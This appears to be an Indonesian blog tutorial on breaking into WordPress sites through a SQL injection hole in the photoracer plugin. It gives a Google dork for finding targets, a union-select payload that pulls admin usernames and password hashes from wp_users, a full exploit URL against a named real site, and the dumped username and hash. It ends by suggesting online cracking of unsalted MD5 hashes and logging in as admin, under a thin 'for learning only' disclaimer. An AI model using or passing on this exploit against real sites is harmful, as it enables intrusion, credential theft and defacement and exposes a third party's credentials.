pertama agan siapin kopi + rokok + cemilan cepuluh cebelas 
dork silahkan agan kembangkan lagi 
kalo ane pake dork yang di bawah ini 
kalo ane pake dork yang di bawah ini dork: inurl:"wp-content/plugins/photoracer/viewimg.php?id="
EXPLOIT +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--agan masukan DORK tadi ke search engine google lalu agan cari lah targetnya yang bisa di eksekusi pake exploit dia atas
gini contoh targetnya yg ane ambil dari google
http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=1
nah agan masukin dah exploit di atas tadi ke belakang angka nomer 1
maka jadinya seperti ini sob http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--.
nah gambar di atas tu yang ane tandain kotak warna merah itu user dan password nya gan
edbong:$P$BZJ19WTKx7P8mOQm6v7frYsuEsoIYg1
sayang sekali gan target ane password nya ada symbol $$ (salt) sampai saat ini ane belom nemuin cara crack password yg type begitu
kalo agan tau cara decrypnya berbagi disini yah nanti ane update postingannya sukur sukur kalo agan nemu passwordnya yang type md5 ga pake salt langsung ajah deh agan crack di web md5 decrypter online lalu agan login sebagai admin web nya
NB : tutor ini ane buat bukan untuk di salah gunakan....tutor ini untuk pembelajaran saja supaya admin admin web terutama admin web indonesia tercinta yang memakai CMS wordpress bisa meng antisipasi serangan dari defacer defacer nakal yang sedang keliaran mencari mangsanya,,ane ga bertanggung jawab jika tutor ini di salah gunakan dan merugikan orang lain apa lagi sampe agan ketangkep unit CYBER CRIME
ihh ngeri dehh gan ...
0 comments:
Post a Comment